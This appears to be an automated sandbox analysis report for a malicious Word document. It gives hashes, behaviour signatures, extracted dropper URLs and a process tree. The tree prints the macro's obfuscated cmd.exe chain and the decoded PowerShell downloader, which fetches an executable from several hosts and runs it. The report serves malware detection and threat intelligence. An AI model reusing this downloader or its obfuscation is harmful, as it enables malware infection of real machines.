Analysis

  • max time kernel
    145s
  • max time network
    131s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-05-2024 00:26

General

  • Target

    620a53fb175e89ffa9d3bb418de2bf76JaffaCakes118.doc

  • Size

    209KB

  • MD5

    620a53fb175e89ffa9d3bb418de2bf76

  • SHA1

    0aaee79492b8ab7a5a7a0fe6a7d8b5ec1891bd07

  • SHA256

    21ac00f9881bdec79e953f5b17bfc41a39b74f7f584c228a88783fdbf6b2f9ce

  • SHA512

    ab99b5555f92ff4b6f9144c878499846740d37ecf1842bdbd88ae6e5158a96fd79e563abb05eb75621666bc254b72c441a670388a9b280fd1b8276b2de8b7896

  • SSDEEP

    3072:q/EEAUFdf/OkQf4I6iNKDzaJFUKc0UTE7yZRUV7RJeOzi8+:HEAgd7k4IZEDzYUTE7yZRVUi8+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://mhnew.enabledware.com/wp-content/upgrade/1Qvuku8g

exe.dropper

http://maquinadefalaringles.info/Us1uHMn

exe.dropper

http://5072610.ru/YjNBdzFKT9

exe.dropper

http://bietthunghiduong24h.info/oVQCPSWV

exe.dropper

http://ustpharm89.net/sYr7xBoXx

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\620a53fb175e89ffa9d3bb418de2bf76JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4552
    • C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set cX9o=T,ov7BUHrO'1=z@x3%s90ny):dVFhXmkI\i$Q+ .{up;wSc(Y8/NjaEfG4Ce}t2b5A~lDLW-M6PKgq&&for %e in (42;2;44;17;74;6;5;69;32;58;24;66;64;1;11;17;8;17;45;54;45;45;32;9;51;51;65;72;54;24;66;71;57;1;11;17;28;17;0;54;72;74;24;66;71;16;1;11;17;67;67;38;35;61;31;55;25;55;34;12;10;18;77;63;67;13;67;44;10;43;35;55;31;18;28;55;13;63;12;21;59;44;71;2;63;52;59;46;61;38;51;59;61;39;70;59;63;58;67;34;59;21;61;43;35;18;8;61;25;52;61;12;10;28;61;61;42;24;50;50;30;28;21;59;44;39;59;21;53;63;67;59;25;44;53;8;59;39;46;2;30;50;44;42;71;46;2;21;61;59;21;61;50;41;42;76;8;53;25;59;50;11;36;3;41;31;41;49;76;14;28;61;61;42;24;50;50;30;53;77;41;34;21;53;25;59;55;53;67;53;8;34;21;76;67;59;18;39;34;21;55;2;50;6;18;11;41;7;72;21;14;28;61;61;42;24;50;50;64;20;4;62;73;11;20;39;8;41;50;48;52;51;5;25;13;27;75;0;19;14;28;61;61;42;24;50;50;63;34;59;61;61;28;41;21;76;28;34;25;41;2;21;76;62;57;28;39;34;21;55;2;50;2;26;36;58;74;45;70;26;14;28;61;61;42;24;50;50;41;18;61;42;28;53;8;30;49;19;39;21;59;61;50;18;48;8;4;15;5;2;29;15;10;39;45;42;67;34;61;47;10;14;10;23;43;35;44;53;41;13;25;12;10;61;52;3;61;34;21;10;43;35;34;77;2;21;30;25;38;12;38;10;16;16;57;10;43;35;13;61;13;18;2;12;10;18;21;18;41;13;30;67;10;43;35;55;34;67;31;63;12;35;59;21;3;24;61;59;30;42;37;10;33;10;37;35;34;77;2;21;30;25;37;10;39;59;15;59;10;43;55;2;8;59;53;46;28;47;35;2;30;34;30;34;13;18;38;34;21;38;35;18;8;61;25;52;61;23;40;61;8;22;40;35;55;31;18;28;55;13;63;39;68;2;44;21;67;2;53;25;27;34;67;59;47;35;2;30;34;30;34;13;18;1;38;35;55;34;67;31;63;23;43;35;63;30;42;25;2;2;42;12;10;52;44;21;61;21;55;10;43;32;55;38;47;47;56;59;61;71;32;61;59;30;38;35;55;34;67;31;63;23;39;67;59;21;76;61;28;38;71;76;59;38;57;20;20;20;20;23;38;40;32;21;3;2;31;59;71;32;61;59;30;38;35;55;34;67;31;63;43;35;28;46;18;13;3;67;12;10;63;31;67;55;8;10;43;63;8;59;53;31;43;60;60;46;53;61;46;28;40;60;60;35;44;13;46;53;18;34;42;12;10;67;25;55;34;34;10;43;79)do set Y9c=!Y9c!!cX9o:~%e,1!&&if %e==79 echo !Y9c:~-610!|cmd.exe"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3056
      • C:\Windows\system32\cmd.exe
        CmD /V/C"set cX9o=T,ov7BUHrO'1=z@x3%s90ny):dVFhXmkI\i$Q+ .{up;wSc(Y8/NjaEfG4Ce}t2b5A~lDLW-M6PKgq&&for %e in (42;2;44;17;74;6;5;69;32;58;24;66;64;1;11;17;8;17;45;54;45;45;32;9;51;51;65;72;54;24;66;71;57;1;11;17;28;17;0;54;72;74;24;66;71;16;1;11;17;67;67;38;35;61;31;55;25;55;34;12;10;18;77;63;67;13;67;44;10;43;35;55;31;18;28;55;13;63;12;21;59;44;71;2;63;52;59;46;61;38;51;59;61;39;70;59;63;58;67;34;59;21;61;43;35;18;8;61;25;52;61;12;10;28;61;61;42;24;50;50;30;28;21;59;44;39;59;21;53;63;67;59;25;44;53;8;59;39;46;2;30;50;44;42;71;46;2;21;61;59;21;61;50;41;42;76;8;53;25;59;50;11;36;3;41;31;41;49;76;14;28;61;61;42;24;50;50;30;53;77;41;34;21;53;25;59;55;53;67;53;8;34;21;76;67;59;18;39;34;21;55;2;50;6;18;11;41;7;72;21;14;28;61;61;42;24;50;50;64;20;4;62;73;11;20;39;8;41;50;48;52;51;5;25;13;27;75;0;19;14;28;61;61;42;24;50;50;63;34;59;61;61;28;41;21;76;28;34;25;41;2;21;76;62;57;28;39;34;21;55;2;50;2;26;36;58;74;45;70;26;14;28;61;61;42;24;50;50;41;18;61;42;28;53;8;30;49;19;39;21;59;61;50;18;48;8;4;15;5;2;29;15;10;39;45;42;67;34;61;47;10;14;10;23;43;35;44;53;41;13;25;12;10;61;52;3;61;34;21;10;43;35;34;77;2;21;30;25;38;12;38;10;16;16;57;10;43;35;13;61;13;18;2;12;10;18;21;18;41;13;30;67;10;43;35;55;34;67;31;63;12;35;59;21;3;24;61;59;30;42;37;10;33;10;37;35;34;77;2;21;30;25;37;10;39;59;15;59;10;43;55;2;8;59;53;46;28;47;35;2;30;34;30;34;13;18;38;34;21;38;35;18;8;61;25;52;61;23;40;61;8;22;40;35;55;31;18;28;55;13;63;39;68;2;44;21;67;2;53;25;27;34;67;59;47;35;2;30;34;30;34;13;18;1;38;35;55;34;67;31;63;23;43;35;63;30;42;25;2;2;42;12;10;52;44;21;61;21;55;10;43;32;55;38;47;47;56;59;61;71;32;61;59;30;38;35;55;34;67;31;63;23;39;67;59;21;76;61;28;38;71;76;59;38;57;20;20;20;20;23;38;40;32;21;3;2;31;59;71;32;61;59;30;38;35;55;34;67;31;63;43;35;28;46;18;13;3;67;12;10;63;31;67;55;8;10;43;63;8;59;53;31;43;60;60;46;53;61;46;28;40;60;60;35;44;13;46;53;18;34;42;12;10;67;25;55;34;34;10;43;79)do set Y9c=!Y9c!!cX9o:~%e,1!&&if %e==79 echo !Y9c:~-610!|cmd.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2280
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $tkfdfi='sqblzlw';$fkshfzb=new-object Net.WebClient;$srtdjt='http://mhnew.enabledware.com/wp-content/upgrade/1Qvuku8g@http://maquinadefalaringles.info/Us1uHMn@http://5072610.ru/YjNBdzFKT9@http://bietthunghiduong24h.info/oVQCPSWV@http://ustpharm89.net/sYr7xBoXx'.Split('@');$wauzd='tjvtin';$iqonmd = '334';$ztzso='snsuzml';$filkb=$env:temp+'\'+$iqonmd+'.exe';foreach($omimizs in $srtdjt){try{$fkshfzb.DownloadFile($omimizs, $filkb);$bmpdoop='jwntnf';If ((Get-Item $filkb).length -ge 40000) {Invoke-Item $filkb;$hcszvl='bklfr';break;}}catch{}}$wzcasip='ldfii';"
          4⤵
            PID:3004
          • C:\Windows\system32\cmd.exe
            cmd.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1448
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell $tkfdfi='sqblzlw';$fkshfzb=new-object Net.WebClient;$srtdjt='http://mhnew.enabledware.com/wp-content/upgrade/1Qvuku8g@http://maquinadefalaringles.info/Us1uHMn@http://5072610.ru/YjNBdzFKT9@http://bietthunghiduong24h.info/oVQCPSWV@http://ustpharm89.net/sYr7xBoXx'.Split('@');$wauzd='tjvtin';$iqonmd = '334';$ztzso='snsuzml';$filkb=$env:temp+'\'+$iqonmd+'.exe';foreach($omimizs in $srtdjt){try{$fkshfzb.DownloadFile($omimizs, $filkb);$bmpdoop='jwntnf';If ((Get-Item $filkb).length -ge 40000) {Invoke-Item $filkb;$hcszvl='bklfr';break;}}catch{}}$wzcasip='ldfii';
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5116

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\TCD94E9.tmp\iso690.xsl
      Filesize

      263KB

      MD5

      ff0e07eff1333cdf9fc2523d323dd654

      SHA1

      77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

      SHA256

      3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

      SHA512

      b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4syo1ikg.u12.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/4552-36-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-583-0x00007FF8CC050000-0x00007FF8CC060000-memory.dmp
      Filesize

      64KB

    • memory/4552-4-0x00007FF8CC050000-0x00007FF8CC060000-memory.dmp
      Filesize

      64KB

    • memory/4552-37-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-6-0x00007FF8CC050000-0x00007FF8CC060000-memory.dmp
      Filesize

      64KB

    • memory/4552-7-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-8-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-9-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-10-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-11-0x00007FF8C9E60000-0x00007FF8C9E70000-memory.dmp
      Filesize

      64KB

    • memory/4552-12-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-14-0x00007FF8C9E60000-0x00007FF8C9E70000-memory.dmp
      Filesize

      64KB

    • memory/4552-15-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-16-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-17-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-13-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-18-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-584-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-27-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-28-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-0-0x00007FF8CC050000-0x00007FF8CC060000-memory.dmp
      Filesize

      64KB

    • memory/4552-38-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-5-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-3-0x00007FF90C06D000-0x00007FF90C06E000-memory.dmp
      Filesize

      4KB

    • memory/4552-19-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-2-0x00007FF8CC050000-0x00007FF8CC060000-memory.dmp
      Filesize

      64KB

    • memory/4552-535-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-538-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-539-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-542-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-545-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-544-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-543-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-541-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-540-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-537-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-536-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-555-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-556-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-557-0x00007FF90BFD0000-0x00007FF90C1C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4552-581-0x00007FF8CC050000-0x00007FF8CC060000-memory.dmp
      Filesize

      64KB

    • memory/4552-582-0x00007FF8CC050000-0x00007FF8CC060000-memory.dmp
      Filesize

      64KB

    • memory/4552-580-0x00007FF8CC050000-0x00007FF8CC060000-memory.dmp
      Filesize

      64KB

    • memory/4552-1-0x00007FF8CC050000-0x00007FF8CC060000-memory.dmp
      Filesize

      64KB

    • memory/5116-55-0x000002A61C730000-0x000002A61C752000-memory.dmp
      Filesize

      136KB